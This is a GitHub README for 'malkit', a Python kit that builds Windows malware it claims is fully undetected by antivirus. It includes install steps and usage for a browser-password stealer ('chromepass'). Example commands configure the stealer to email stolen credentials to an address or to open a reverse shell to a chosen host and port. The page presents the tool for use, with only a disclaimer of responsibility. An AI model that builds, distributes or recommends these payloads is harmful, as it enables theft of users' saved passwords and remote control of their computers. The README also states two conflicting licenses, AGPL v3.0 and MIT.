darkarp / malkit

Full malware Kit
GNU Affero General Public License v3.0
57 stars 10 forks source link

Malkit - Full malware kit

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

Report Bug · Request Feature

Table of Contents

About The project

Malkit is a python-based console application that generates runtime-decrypted undetectable windows executables. It has the following features:

Features marked with an X are still in development and aren't fully working but are already complete in internal testing.

AV Detection!

Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed

Getting started

Dependencies and Requirements

For this application you need:

Installation

Chromepass requires Python 3.6+ to run. It has been tested on a full anaconda installation but it doesn't necessariliy require it. It doesn't work with Python 3.8 yet The instructions on the full setup are below.

Setup Anaconda environment:

Clone the Repository and access its directory:

> git clone https://github.com/darkarp/malkit.git
> cd malkit

Install the dependencies:

> pip install -r requirements.txt

If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ < 3.8 (preferably 3.7.5). If the errors persist, try:

> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt

If any errors still persist, make sure you have the following installed:

Usage

usage: python malkit.py [-h] {build_listener, build_malware, build_chromepass} ...

positional arguments:
  {build_listener, build_malware, build_chromepass}

optional arguments:
  -h, --help            show this help message and exit
usage: python malkit.py build_chromepass [-h] [--load] [--email] [--reverse_shell]
                                  [--no_error]
                                  [--errormsg Error message to appear]
                                  [--address Email address to send details to, if Email was chosen]
                                  [--port Port for reverse connection, if Reverse shell was chosen.]
                                  [--host Host reverse connection, if Reverse shell was chosen.]

optional arguments:
  -h, --help            show this help message and exit
  --load
  --email
  --reverse_shell
  --no_error
  --errormsg Error message to appear
  --address Email address to send details to, if Email was chosen
  --port Port for reverse connection, if Reverse shell was chosen.
  --host Host reverse connection, if Reverse shell was chosen.

example:

 python malkit.py build_chromepass --email --address myemail@gmail.com
 python malkit.py build_chromepass --reverse_shell --host 127.0.0.1 -p 4444
 python malkit.py build_chromepass --load myfile.conf

Todo

Errors, Bugs and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.

Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: marionascimento@itsec.bz

Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

License

MIT